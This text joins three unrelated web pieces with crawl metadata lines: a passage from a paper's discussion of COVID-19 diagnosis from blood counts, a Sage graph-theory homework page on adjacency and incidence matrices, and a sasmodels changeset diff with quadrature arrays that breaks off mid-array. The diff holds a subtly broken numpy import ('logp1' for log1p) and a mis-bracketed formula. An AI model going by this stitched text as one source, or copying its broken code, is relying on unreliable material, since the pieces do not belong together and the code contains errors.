We also considered how the model would perform in an endemic scenario in which individuals infected with SARS-Cov-2 could be scarce, and where other types of confounding viruses might be present. To simulate different scenarios, we evaluate the stacked model on data with different COVID-19 prevalences. Specifically, we sample exams from the second wave validation and 2019 data to control the COVID-19 prevalence. The main goal is to stress the stacked model by presenting cases before any safety and/or social distancing policies could take place, in an attempt to mimic what could happen in an endemic future. These results are summarized by the AUROC, sensitivity, and specificity numbers for each evaluated COVID-19 prevalence presented in Table 3. To guarantee statistical significance, we perform 30 repetitions of each simulation and present the respective 95% confidence intervals. The stacked model proved to be robust on varying levels of COVID-19 prevalence.
## Discussion
The CBC is a simple and inexpensive exam. It is part of most laboratory routines, so "astute practitioners may use nuances and clues from the CBC in many clinical situations”10. Liu et al.46 devised a high accuracy risk assessment tool that can predict the mortality for COVID-19 through CBCs. Li et al.47 verified that the low count of white blood cells is related to COVID-19 severity by analyzing 12 death cases of COVID-19 and 18 individuals with moderate to severe symptoms, verifying low lymphocyte percentage in most of the cases. Although our dataset had no indicator of severity, we did find a drop in lymphocyte count the closer individuals were to their first positive RT-PCR results, corroborating this finding. Furthermore, we also verified many other analytes that shared a similar pattern. Although more research is needed, we believe that the key analytes indicated by our model might provide possibilities for future research. Literature suggests that there might be existing intrinsic relationships between analytes that might be characteristic of COVID-19. For instance, Nalbant et al.48 found that the neutrophil/lymphocyte ratio (NLR) might be particularly typical of COVID-19 infection. However, there is a profusion of other possible promising ratios and patterns currently being under-analyzed for the sake of COVID-19 diagnosis. One of the secondary goals of this work is to investigate this hypothesis, and we confirmed that our search algorithm tends to favor ratios over analyte count values.
We identified several works attempting to exploit blood counts to detect COVID-19 with the help of machine learning algorithms. Avila et al.49 trained a naive Bayes classifier with data from 510 individuals admitted to hospitals presenting COVID-19-like symptoms with a reported AUROC of 0.84. Silveira et al.50 devised a solution based on gradient boosting machines that focuses primarily on white series analytes. They achieved an AUROC of 0.81 in a dataset composed of anonymous data from 1157 individuals. Banerjee51 trained both a shallow neural network as well as a random forest model to distinguish COVID-19 cases on data from 954 individuals, reaching an AUROC of 0.94 for those who were admitted to the hospital with severe symptoms, and an AUROC of 0.80 for individuals with mild symptoms. Cabitza et al.52 evaluate different machine learning algorithms on both a COVID-19 specific dataset as well as another dataset including individuals who exhibited pneumonia symptoms in 2018, consisting of data from 1624 cases. By exploring a variety of biomarkers, including the analytes from CBCs, they were able to achieve an AUROC of 0.90. However, a point of concern for such studies is data scale. We know from the literature that complex machine learning models are prone to overfitting and, with small sample sizes containing only a few hundred individuals, all these works are at risk of presenting unreliable results and overestimated performance.
Wynants et al.18 provided a study of 37,421 research titles, with 169 studies describing 232 prediction models, of which 208 contained unique, newly developed models. These models contained both a diagnostic solution to identify suspected infection cases as well as prognostic evaluation. One of the key findings was that all models were at high (97%, n = 226) or unclear (3%, n = 6) risk of bias according to an assessment with PROBAST, suggesting a risk for unreliable predictions when employed in the real world. A similar finding was also reported by Bastos et al.19, which verified that, out of the 49 risk assessments performed over 5016 references and 40 studies, 98% reported a high risk of individual selection bias. Only 4 studies included outpatients and only two performed some sort of validation at the point of care. This kind of problem is not specific to COVID-19 related research and has been present in many previous medical studies. As mentioned by53
"... failure to proactively and comprehensively mitigate all biases—including latent ones that only emerge over time—risks exacerbating health disparities, eroding public trust in healthcare and health systems, and somewhat ironically, hindering the adoption of AI-based systems that could otherwise help individuals live better lives."
With that in mind, it is important to highlight the work of Soltan et al.54 which, with the help of the Oxford University Hospital, included 114,957 individuals in a COVID-negative cohort and 437 in a COVID-positive cohort, thus establishing a dataset of 115,394 individuals for a full study. Before our work, this was the most extensive COVID-19 study to date. While exploring a variety of scenarios regarding COVID-19 prevalence, they reported AUROC values ranging from 0.88 up to 0.94 if their model employs additional data from CBCs, blood gas, and other vital signs collected in routine clinical exams. However, one key concern in this study is the low prevalence of Influenza-like infections (<0.1%), which drew our attention to a different kind of selection bias in COVID-19 research. Due to the hygiene habits acquired by the population worldwide after the pandemic outbreak, we believe that many other confounding diseases might be underrepresented in most performed datasets. As such, models might be learning patterns that are associated with a general infectious condition rather than specifically with COVID-19.
Our concern regarding data bias in the latest COVID-19 research appears to be valid, as was verified during our experiments assessing performance on data before 2020. Several instances of individuals with different variants of the Influenza virus were initially labeled as potential COVID-19 infected, which we knew not to be true. As such, we devised an approach to insert information regarding other diseases into our model without harming accuracy. In particular, we explored two approaches: the first one being simply retraining our specialized model with the added data of negative COVID, whilst keeping positive results for other diseases. The second approach had the objective of creating an ensemble of models with constituents specialized in other virus infections. We observed similar AUROC results between both, with the first one having a slightly higher AUROC result at the cost of lower differentiation capabilities.
We plot the importance of each feature for every individual, and these results are shown in Fig. 7. Yellow points are associated with individuals for whom the corresponding feature shows a relatively high value. Blue points, on the other hand, are associated with individuals for whom the corresponding feature shows a relatively low value. Furthermore, there is a vertical line separating individuals for whom the feature is contributing either to decrease (left side) or increase (right side) the probability of active SARS-Cov-2 infection. Figure 7a shows the COVID-19 specialized model, and the CBC patterns shown in the figure are not specific to COVID-19, as discussed in previous experiments. Figure 7b shows the stacking model, where the COVID-19 specialized model is included as one of the features (i.e., COVID-19 probability). As the stacking model takes into consideration the probability of diverse infections, COVID-19 specific CBC patterns are found.
The stacking approach allows us to study how the physiological patterns found in CBCs of different diseases co-relate. Figure 7c–e illustrates dependence plots of our COVID-19 specialized model prediction concerning remaining diseases, which present relevant patterns that enhance the credibility of our approach. For instance, looking at the right portion of Fig. 7c, we observe a concentration of high Influenza-H1N1 predictions (yellow points) on the upper side of the plot, with a similar pattern on the left side of the plot and a concentration on the lower portion. This behavior shows us that in cases of suspicion of H1N1, the overall prediction of COVID is significant, be it to confirm an H1N1 hypothesis (left side) or rule it out (right side). However, when there is a lower probability of H1N1, we likewise see a lower scoring attributed to the COVID-19 model. The ensemble learns to use the information regarding all diseases for these hard-to-predict individuals. We observe similar patterns in Influenza-A (Fig. 7d), and Seasonal Influenza (Fig. 7e).
Employing Shapley values as an explanation technique not only allows us to understand the model’s final prediction but also to understand the testing time frame. Supplementary Fig. 4 shows a 2D representation of the tests of several individuals contained in the dataset and their respective RT-PCR results for COVID-19. In Supplementary Fig. 4a we observe no clear distinction between exams of infected or healthy individuals and represent what might be observed in an attempt to draw linear correlations between analytes. Supplementary Fig. 4b shows a visualization of the decision process of the model in the shape of a 2D representation of the returned Shapley values. This scenario reflects all the non-linear relationships present in a CBC that might be challenging for humans to extrapolate on their own. Not only can we draw clear divisions between both individual populations but we are also able to infer a measure of confidence. The closer to the decision boundary, the higher the uncertainty of the prediction and, thus, more important the discerning capabilities when combining these results with other relevant factors for diagnosis, such as reported symptoms and possible disease onset period.
Predicting data from the second wave proved to be particularly hard, as we observed a deterioration in the performance of our first wave model as time went on, which might be associated with concept drift. In particular, we observed that the peak in performance on the second half of the chart is associated with a lower COVID-19 prevalence, which implied that the model was losing its ability to predict COVID-19 infections. We hypothesize some explanations for this behavior, including the effect of distribution of COVID-19 prevalence in 2020 and across 2021, as well as the prevalence of other possible confounding diseases, which changed as restriction measures were lifted. Likewise, one of the main characteristics of the second wave is the emergence of a new COVID-19 strain, namely the P.1 variant that ran rampant in Brazil during the analyzed period. It might be the case that the physiological reaction of the body to the new strain was distinct from the earlier variants, resulting in degradation in performance. Finally, another possibility is that RT-PCR tests at the time of evaluation might not have been tuned to properly identify the new strain, thus inducing a divergence between model output and ground-truth data due to possible false negatives.
The proposed solution consisted of employing data closer to the start of the second wave, simulating a scenario where we keep the model as up-to-date as possible before the start of a new pandemic stage. Although we could not test for each of these hypotheses, the proposed approach should solve for all of the three possible explanations described. With this approach, not only did we verify a higher performance from the start, but the model was able to largely mitigate the concept drift phenomena, retaining an AUROC above the 0.90 threshold throughout most of the evaluated period.
A point of attention that should be addressed by any health professional when employing our approach is the presence of co-infections. For instance, multiple cases of COVID-19 hospital cross-infections have been identified55. As we do not have data explicitly concerning co-infections, we cannot provide insights regarding the blood profiles that emerge in such situations which might confuse the model. It is also important to highlight the impact of ethnicity on CBC results56. Although the large data sample and the demographic plurality of Brazil serve as indicators of robustness, further testing is needed to understand if the Brazilian model can be directly applied to other contexts. Nevertheless, our method is generalist to an extent that the achieved results could be potentially replicated anywhere on Earth if data concerning a specific region/scenario is collected.
In this work, we proposed a novel machine intelligence approach to automated COVID-19 diagnosis through complete blood counts, a repurposing of an accessible and low-cost exam. The task was formulated as a binary classification problem to predict which analyte combinations are likely to be associated with SARS-Cov-2 infection. We evaluated our approach on a dataset containing over a million exams which, to the author’s knowledge, is the largest COVID-19 dataset to date. One of our key results pointed out that training machine learning models solely on 2020 data are not enough to guarantee robustness in real-world applications even with high reported performance estimates. This raises several concerns regarding the latest COVID-19 machine learning literature and confirms issues that were already brought to attention but not properly addressed. Providing information regarding other diseases was essential to guarantee robustness and our stacking approach, which presented a high performance in the wake of scenarios with both prevalence and absence of COVID-19 infections, with a reported AUROC of 0. 90+.
For future work, it is imperative to assess the impact of our approach on a hospital’s daily flow, as the adoption of new technology can potentially disrupt existing processes. This should also enable us to collect data concerning other relevant analysis, such as co-infections and studying the impact of different demographic profiles. We are currently implementing the developed algorithm in different Brazilian hospitals using an API framework connected directly to their databases. In these scenarios, we aim to understand how the proposed tool can be introduced into a hospital’s existing workflow in the least disruptive way, as well as find out how comfortable health professionals feel when using it. Further validation thesis include observing health professionals’ interactions with the tool and possible changes in procedures, protocols, and decision-making processes, as well as the benefits of the solution if applied in fast-paced and high-volume contexts.
Since CBCs are widely available and provide results at a fast pace, different use cases have been mapped: to potentially speed up triaging processes in hospitals where other forms of diagnosis are tardier; to support clinical diagnosis and triaging in hospitals where other forms of diagnosis are scarce or unavailable; and to reduce overall system burdening of traditional diagnostic methods when applied as pre-tests to non-emergency situations (such as elective surgeries), to name a few examples. Given its versatile nature, low cost, and speed, we believe our tool to be particularly useful in a variety of scenarios—both pandemic and post-pandemic. | 2023-03-24 01:41:41 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 2, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4431554973125458, "perplexity": 1644.4991324615737}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945218.30/warc/CC-MAIN-20230323225049-20230324015049-00628.warc.gz"} |
http://plufa12m331.wikidot.com/project-4 | Project 4
For this Sage project, please watch the Graph Theory video on the Sage videos page. This video is a bit longer than the others, but teaches the basic theory behind graphs. Using these ideas, complete the following tasks.
1. Use Sage to draw the graph for the following adjacency matrix:
(1)
\begin{align} A=\left(\begin{array}{rrrrrr} 0 & 1 & 0 & 0 & 0 & 0 \\ 0 & 0 & 1 & 0 & 0 & 0 \\ 0 & 0 & 0 & 1 & 0 & 0 \\ 0 & 0 & 0 & 0 & 1 & 0 \\ 0 & 0 & 0 & 0 & 0 & 1 \\ 0 & 0 & 0 & 0 & 0 & 0 \end{array}\right) \end{align}
2. For $A$ given above, draw the graph associated to the matrix $A^2, A^3, A^4, A^5$ and $A^6$.
3. Make up two graphs: one on 4 vertices and one on 5 vertices using an adjacency matrices, $C$ and $D$. Have Sage draw your graphs and then draw the graphs for $C^2, C^3, C^4$ and $D^2, D^3, D^4$, etc.. Can you guess how graphs associated to matrix powers of the adjacency matrix are related to the original graph?
4. Draw your own graph on 4 vertices and figure out the adjacency matrix and the incidence matrix. Input the graph into Sage using the adjacency matrix and then the incidence matrix for your graph. Use Sage's features to determine if you created the matrices correctly (i.e. are the two graphs created the exact same?)
5. Take the following proposed incidence matrix and ask Sage to draw the graph associated to it. Explain why you get an error (in other words, can you use Sage's error to figure out why this is NOT an incidence matrix?) Determine a condition on the columns of a matrix to make it an incidence matrix of a graph.
(2)
\begin{align} B=\left(\begin{array}{rrrrr} 0 & 0 & 1 & 0 & 0 \\ 0 & 0 & 0 & -1 & 1 \\ 1 & -1 & -1 & 0 & 0 \\ 0 & 1 & 0 & 0 & -1 \\ -1 & 0 & -1 & 0 & 0 \\ 0 & 0 & 0 & 1 & 0 \end{array}\right) \end{align}
6. What graph corresponds to the identity matrix as an adjacency matrix? What about the $0$ matrix?
7. Let $J$ be the $n\times n$ matrix given by all 1's, so $J_{i,j}=1$ for all $i,j$. Draw the graph with adjacency matrix $J-I_n$ (where $I_n$ is the identity matrix) for a few different $n$ values. Explain the graph in words. How many edges are there in this graph?
8. Optional Explorations (because I may not know the answer completely or if there is an answer at all):
a. Is there any property that a graph will have that will force the adjacency matrix to be invertible (or nonsingular)?
b. Is there any property a graph will have that will force the adjacency matrix to be singular?
c. What does it mean for two rows to be exactly the same in an adjacency matrix.
d. Can you easily determine the rank of an incidence matrix? Are there any conditions that force the rank to be less than the number of rows or columns?
e. Do you have any questions to add?
page revision: 2, last edited: 20 Nov 2012 05:42 | 2018-12-13 06:17:52 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 2, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9864280819892883, "perplexity": 87.16650964263678}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-51/segments/1544376824525.29/warc/CC-MAIN-20181213054204-20181213075704-00311.warc.gz"} |
http://trac.sasview.org/changeset/d0dc9a3eb51c366ad12aca86498d6593a798252a/sasmodels | # Changeset d0dc9a3 in sasmodels
Ignore:
Timestamp:
Dec 4, 2017 8:29:04 AM (5 years ago)
Branches:
master, core_shell_microgels, magnetic_model, ticket-1257-vesicle-product, ticket_1156, ticket_1265_superball, ticket_822_more_unit_tests
Children:
df69efa
Parents:
7dde87f
Message:
document GAUSS_N, GAUSS_Z, GAUSS_W and simplify use from sasmodels.special
Files:
2 edited
### Legend:
Unmodified
r3048ec6 M_PI, M_PI_2, M_PI_4, M_SQRT1_2, M_E: $\pi$, $\pi/2$, $\pi/4$, $1/\sqrt{2}$ and Euler's constant $e$ exp, log, pow(x,y), expm1, sqrt: Power functions $e^x$, $\ln x$, $x^y$, $e^x - 1$, $\sqrt{x}$. The function expm1(x) is accurate across all $x$, including $x$ very close to zero. exp, log, pow(x,y), expm1, log1p, sqrt, cbrt: Power functions $e^x$, $\ln x$, $x^y$, $e^x - 1$, $\ln 1 + x$, $\sqrt{x}$, $\sqrt[3]{x}$. The functions expm1(x) and log1p(x) are accurate across all $x$, including $x$ very close to zero. sin, cos, tan, asin, acos, atan: Trigonometry functions and inverses, operating on radians. atan(y/x) would return a value in quadrant I. Similarly for quadrants II and IV when $x$ and $y$ have opposite sign. fmin(x,y), fmax(x,y), trunc, rint: fabs(x), fmin(x,y), fmax(x,y), trunc, rint: Floating point functions. rint(x) returns the nearest integer. NAN: NaN, Not a Number, $0/0$. Use isnan(x) to test for NaN. Note that you cannot use :code:x == NAN to test for NaN values since that will always return false. NAN does not equal NAN! will always return false. NAN does not equal NAN! The alternative, :code:x != x may fail if the compiler optimizes the test away. INFINITY: $\infty, 1/0$. Use isinf(x) to test for infinity, or isfinite(x) Similar arrays are available in :code:gauss20.c for 20-point quadrature and in :code:gauss150.c for 150-point quadrature. The macros :code:GAUSS_N, :code:GAUSS_Z and :code:GAUSS_W are defined so that you can change the order of the integration by selecting an different source without touching the C code. :code:source = ["lib/gauss76.c", ...]
re65c3ba ................. The C code follows the C99 standard, with the usual math functions, as defined in OpenCL _. This includes the following: This following standard C99 math functions are available: M_PI, M_PI_2, M_PI_4, M_SQRT1_2, M_E: $\pi$, $\pi/2$, $\pi/4$, $1/\sqrt{2}$ and Euler's constant $e$ exp, log, pow(x,y), expm1, sqrt: Power functions $e^x$, $\ln x$, $x^y$, $e^x - 1$, $\sqrt{x}$. The function expm1(x) is accurate across all $x$, including $x$ very close to zero. exp, log, pow(x,y), expm1, log1p, sqrt, cbrt: Power functions $e^x$, $\ln x$, $x^y$, $e^x - 1$, $\ln 1 + x$, $\sqrt{x}$, $\sqrt[3]{x}$. The functions expm1(x) and log1p(x) are accurate across all $x$, including $x$ very close to zero. sin, cos, tan, asin, acos, atan: quadrants II and IV when $x$ and $y$ have opposite sign. fmin(x,y), fmax(x,y), trunc, rint: fabs(x), fmin(x,y), fmax(x,y), trunc, rint: Floating point functions. rint(x) returns the nearest integer. NaN, Not a Number, $0/0$. Use isnan(x) to test for NaN. Note that you cannot use :code:x == NAN to test for NaN values since that will always return false. NAN does not equal NAN! will always return false. NAN does not equal NAN! The alternative, :code:x != x may fail if the compiler optimizes the test away. INFINITY: for forcing a constant to stay double precision. The following special functions and scattering calculations are defined in sasmodels/models/lib _. The following special functions and scattering calculations are defined. These functions have been tuned to be fast and numerically stable down to $q=0$ even in single precision. In some cases they work around bugs Gauss76Z[i], Gauss76Wt[i]: gauss76.n, gauss76.z[i], gauss76.w[i]: Points $z_i$ and weights $w_i$ for 76-point Gaussian quadrature, respectively, computing $\int_{-1}^1 f(z)\,dz \approx \sum_{i=1}^{76} w_i\,f(z_i)$. Similar arrays are available in :code:gauss20.c for 20-point quadrature and in :code:gauss150.c for 150-point quadrature. When translating the model to C, include 'lib/gauss76.c' in the source and use :code:GAUSS_N, :code:GAUSS_Z, and :code:GAUSS_W. Similar arrays are available in :code:gauss20 for 20-point quadrature and :code:gauss150.c for 150-point quadrature. By using :code:import gauss76 as gauss it is easy to change the number of points in the integration. """ # pylint: disable=unused-import # C99 standard math library functions from numpy import exp, log, power as pow, expm1, sqrt from numpy import exp, log, power as pow, expm1, logp1, sqrt, cbrt from numpy import sin, cos, tan, arcsin as asin, arccos as acos, arctan as atan from numpy import sinh, cosh, tanh, arcsinh as asinh, arccosh as acosh, arctanh as atanh from numpy import arctan2 as atan2 from numpy import fmin, fmax, trunc, rint from numpy import NAN, inf as INFINITY from numpy import fabs, fmin, fmax, trunc, rint from numpy import pi, nan, inf from scipy.special import gamma as sas_gamma from scipy.special import erf as sas_erf # C99 standard math constants M_PI, M_PI_2, M_PI_4, M_SQRT1_2, M_E = np.pi, np.pi/2, np.pi/4, np.sqrt(0.5), np.e NAN = nan INFINITY = inf # non-standard constants """return sin(x), cos(x)""" return sin(x), cos(x) sincos = SINCOS def square(x): # Gaussians Gauss20Wt = np.array([ .0176140071391521, .0406014298003869, .0626720483341091, .0832767415767047, .10193011981724, .118194531961518, .131688638449177, .142096109318382, .149172986472604, .152753387130726, .152753387130726, .149172986472604, .142096109318382, .131688638449177, .118194531961518, .10193011981724, .0832767415767047, .0626720483341091, .0406014298003869, .0176140071391521 ]) Gauss20Z = np.array([ -.993128599185095, -.963971927277914, -.912234428251326, -.839116971822219, -.746331906460151, -.636053680726515, -.510867001950827, -.37370608871542, -.227785851141645, -.076526521133497, .0765265211334973, .227785851141645, .37370608871542, .510867001950827, .636053680726515, .746331906460151, .839116971822219, .912234428251326, .963971927277914, .993128599185095 ]) Gauss76Wt = np.array([ .00126779163408536, #0 .00294910295364247, .00462793522803742, .00629918049732845, .00795984747723973, .00960710541471375, .0112381685696677, .0128502838475101, .0144407317482767, .0160068299122486, .0175459372914742, #10 .0190554584671906, .020532847967908, .0219756145344162, .0233813253070112, .0247476099206597, .026072164497986, .0273527555318275, .028587223650054, .029773487255905, .0309095460374916, #20 .0319934843404216, .0330234743977917, .0339977794120564, .0349147564835508, .0357728593807139, .0365706411473296, .0373067565423816, .0379799643084053, .0385891292645067, .0391332242205184, #30 .0396113317090621, .0400226455325968, .040366472122844, .0406422317102947, .0408494593018285, .040987805464794, .0410570369162294, .0410570369162294, .040987805464794, .0408494593018285, #40 .0406422317102947, .040366472122844, .0400226455325968, .0396113317090621, .0391332242205184, .0385891292645067, .0379799643084053, .0373067565423816, .0365706411473296, .0357728593807139, #50 .0349147564835508, .0339977794120564, .0330234743977917, .0319934843404216, .0309095460374916, .029773487255905, .028587223650054, .0273527555318275, .026072164497986, .0247476099206597, #60 .0233813253070112, .0219756145344162, .020532847967908, .0190554584671906, .0175459372914742, .0160068299122486, .0144407317482767, .0128502838475101, .0112381685696677, .00960710541471375, #70 .00795984747723973, .00629918049732845, .00462793522803742, .00294910295364247, .00126779163408536 #75 (indexed from 0) ]) Gauss76Z = np.array([ -.999505948362153, #0 -.997397786355355, -.993608772723527, -.988144453359837, -.981013938975656, -.972229228520377, -.961805126758768, -.949759207710896, -.936111781934811, -.92088586125215, -.904107119545567, #10 -.885803849292083, -.866006913771982, -.844749694983342, -.822068037328975, -.7980001871612, -.77258672828181, -.74587051350361, -.717896592387704, -.688712135277641, -.658366353758143, #20 -.626910417672267, -.594397368836793, -.560882031601237, -.526420920401243, -.491072144462194, -.454895309813726, -.417951418780327, -.380302767117504, -.342012838966962, -.303146199807908, #30 -.263768387584994, -.223945802196474, -.183745593528914, -.143235548227268, -.102483975391227, -.0615595913906112, -.0205314039939986, .0205314039939986, .0615595913906112, .102483975391227, #40 .143235548227268, .183745593528914, .223945802196474, .263768387584994, .303146199807908, .342012838966962, .380302767117504, .417951418780327, .454895309813726, .491072144462194, #50 .526420920401243, .560882031601237, .594397368836793, .626910417672267, .658366353758143, .688712135277641, .717896592387704, .74587051350361, .77258672828181, .7980001871612, #60 .822068037328975, .844749694983342, .866006913771982, .885803849292083, .904107119545567, .92088586125215, .936111781934811, .949759207710896, .961805126758768, .972229228520377, #70 .981013938975656, .988144453359837, .993608772723527, .997397786355355, .999505948362153 #75 ]) Gauss150Z = np.array([ -0.9998723404457334, -0.9993274305065947, -0.9983473449340834, -0.9969322929775997, -0.9950828645255290, -0.9927998590434373, -0.9900842691660192, -0.9869372772712794, -0.9833602541697529, -0.9793547582425894, -0.9749225346595943, -0.9700655145738374, -0.9647858142586956, -0.9590857341746905, -0.9529677579610971, -0.9464345513503147, -0.9394889610042837, -0.9321340132728527, -0.9243729128743136, -0.9162090414984952, -0.9076459563329236, -0.8986873885126239, -0.8893372414942055, -0.8795995893549102, -0.8694786750173527, -0.8589789084007133, -0.8481048644991847, -0.8368612813885015, -0.8252530581614230, -0.8132852527930605, -0.8009630799369827, -0.7882919086530552, -0.7752772600680049, -0.7619248049697269, -0.7482403613363824, -0.7342298918013638, -0.7198995010552305, -0.7052554331857488, -0.6903040689571928, -0.6750519230300931, -0.6595056411226444, -0.6436719971150083, -0.6275578900977726, -0.6111703413658551, -0.5945164913591590, -0.5776035965513142, -0.5604390262878617, -0.5430302595752546, -0.5253848818220803, -0.5075105815339176, -0.4894151469632753, -0.4711064627160663, -0.4525925063160997, -0.4338813447290861, -0.4149811308476706, -0.3959000999390257, -0.3766465660565522, -0.3572289184172501, -0.3376556177463400, -0.3179351925907259, -0.2980762356029071, -0.2780873997969574, -0.2579773947782034, -0.2377549829482451, -0.2174289756869712, -0.1970082295132342, -0.1765016422258567, -0.1559181490266516, -0.1352667186271445, -0.1145563493406956, -0.0937960651617229, -0.0729949118337358, -0.0521619529078925, -0.0313062657937972, -0.0104369378042598, 0.0104369378042598, 0.0313062657937972, 0.0521619529078925, 0.0729949118337358, 0.0937960651617229, 0.1145563493406956, 0.1352667186271445, 0.1559181490266516, 0.1765016422258567, 0.1970082295132342, 0.2174289756869712, 0.2377549829482451, 0.2579773947782034, 0.2780873997969574, 0.2980762356029071, 0.3179351925907259, 0.3376556177463400, 0.3572289184172501, 0.3766465660565522, 0.3959000999390257, 0.4149811308476706, 0.4338813447290861, 0.4525925063160997, 0.4711064627160663, 0.4894151469632753, 0.5075105815339176, 0.5253848818220803, 0.5430302595752546, 0.5604390262878617, 0.5776035965513142, 0.5945164913591590, 0.6111703413658551, 0.6275578900977726, 0.6436719971150083, 0.6595056411226444, 0.6750519230300931, 0.6903040689571928, 0.7052554331857488, 0.7198995010552305, 0.7342298918013638, 0.7482403613363824, 0.7619248049697269, 0.7752772600680049, 0.7882919086530552, 0.8009630799369827, 0.8132852527930605, 0.8252530581614230, 0.8368612813885015, 0.8481048644991847, 0.8589789084007133, 0.8694786750173527, 0.8795995893549102, 0.8893372414942055, 0.8986873885126239, 0.9076459563329236, 0.9162090414984952, 0.9243729128743136, 0.9321340132728527, 0.9394889610042837, 0.9464345513503147, 0.9529677579610971, 0.9590857341746905, 0.9647858142586956, 0.9700655145738374, 0.9749225346595943, 0.9793547582425894, 0.9833602541697529, 0.9869372772712794, 0.9900842691660192, 0.9927998590434373, 0.9950828645255290, 0.9969322929775997, 0.9983473449340834, 0.9993274305065947, 0.9998723404457334 ]) Gauss150Wt = np.array([ 0.0003276086705538, 0.0007624720924706, 0.0011976474864367, 0.0016323569986067, 0.0020663664924131, 0.0024994789888943, 0.0029315036836558, 0.0033622516236779, 0.0037915348363451, 0.0042191661429919, 0.0046449591497966, 0.0050687282939456, 0.0054902889094487, 0.0059094573005900, 0.0063260508184704, 0.0067398879387430, 0.0071507883396855, 0.0075585729801782, 0.0079630641773633, 0.0083640856838475, 0.0087614627643580, 0.0091550222717888, 0.0095445927225849, 0.0099300043714212, 0.0103110892851360, 0.0106876814158841, 0.0110596166734735, 0.0114267329968529, 0.0117888704247183, 0.0121458711652067, 0.0124975796646449, 0.0128438426753249, 0.0131845093222756, 0.0135194311690004, 0.0138484622795371, 0.0141714592928592, 0.0144882814685445, 0.0147987907597169, 0.0151028518701744, 0.0154003323133401, 0.0156911024699895, 0.0159750356447283, 0.0162520081211971, 0.0165218992159766, 0.0167845913311726, 0.0170399700056559, 0.0172879239649355, 0.0175283451696437, 0.0177611288626114, 0.0179861736145128, 0.0182033813680609, 0.0184126574807331, 0.0186139107660094, 0.0188070535331042, 0.0189920016251754, 0.0191686744559934, 0.0193369950450545, 0.0194968900511231, 0.0196482898041878, 0.0197911283358190, 0.0199253434079123, 0.0200508765398072, 0.0201676730337687, 0.0202756819988200, 0.0203748563729175, 0.0204651529434560, 0.0205465323660984, 0.0206189591819181, 0.0206824018328499, 0.0207368326754401, 0.0207822279928917, 0.0208185680053983, 0.0208458368787627, 0.0208640227312962, 0.0208731176389954, 0.0208731176389954, 0.0208640227312962, 0.0208458368787627, 0.0208185680053983, 0.0207822279928917, 0.0207368326754401, 0.0206824018328499, 0.0206189591819181, 0.0205465323660984, 0.0204651529434560, 0.0203748563729175, 0.0202756819988200, 0.0201676730337687, 0.0200508765398072, 0.0199253434079123, 0.0197911283358190, 0.0196482898041878, 0.0194968900511231, 0.0193369950450545, 0.0191686744559934, 0.0189920016251754, 0.0188070535331042, 0.0186139107660094, 0.0184126574807331, 0.0182033813680609, 0.0179861736145128, 0.0177611288626114, 0.0175283451696437, 0.0172879239649355, 0.0170399700056559, 0.0167845913311726, 0.0165218992159766, 0.0162520081211971, 0.0159750356447283, 0.0156911024699895, 0.0154003323133401, 0.0151028518701744, 0.0147987907597169, 0.0144882814685445, 0.0141714592928592, 0.0138484622795371, 0.0135194311690004, 0.0131845093222756, 0.0128438426753249, 0.0124975796646449, 0.0121458711652067, 0.0117888704247183, 0.0114267329968529, 0.0110596166734735, 0.0106876814158841, 0.0103110892851360, 0.0099300043714212, 0.0095445927225849, 0.0091550222717888, 0.0087614627643580, 0.0083640856838475, 0.0079630641773633, 0.0075585729801782, 0.0071507883396855, 0.0067398879387430, 0.0063260508184704, 0.0059094573005900, 0.0054902889094487, 0.0050687282939456, 0.0046449591497966, 0.0042191661429919, 0.0037915348363451, 0.0033622516236779, 0.0029315036836558, 0.0024994789888943, 0.0020663664924131, 0.0016323569986067, 0.0011976474864367, 0.0007624720924706, 0.0003276086705538 ]) class Gauss: def __init__(self, w, z): self.n = len(w) self.w = w self.z = z gauss20 = Gauss( w=np.array([ .0176140071391521, .0406014298003869, .0626720483341091, .0832767415767047, .10193011981724, .118194531961518, .131688638449177, .142096109318382, .149172986472604, .152753387130726, .152753387130726, .149172986472604, .142096109318382, .131688638449177, .118194531961518, .10193011981724, .0832767415767047, .0626720483341091, .0406014298003869, .0176140071391521 ]), z=np.array([ -.993128599185095, -.963971927277914, -.912234428251326, -.839116971822219, -.746331906460151, -.636053680726515, -.510867001950827, -.37370608871542, -.227785851141645, -.076526521133497, .0765265211334973, .227785851141645, .37370608871542, .510867001950827, .636053680726515, .746331906460151, .839116971822219, .912234428251326, .963971927277914, .993128599185095 ]) ) gauss76 = Gauss( w=np.array([ .00126779163408536, #0 .00294910295364247, .00462793522803742, .00629918049732845, .00795984747723973, .00960710541471375, .0112381685696677, .0128502838475101, .0144407317482767, .0160068299122486, .0175459372914742, #10 .0190554584671906, .020532847967908, .0219756145344162, .0233813253070112, .0247476099206597, .026072164497986, .0273527555318275, .028587223650054, .029773487255905, .0309095460374916, #20 .0319934843404216, .0330234743977917, 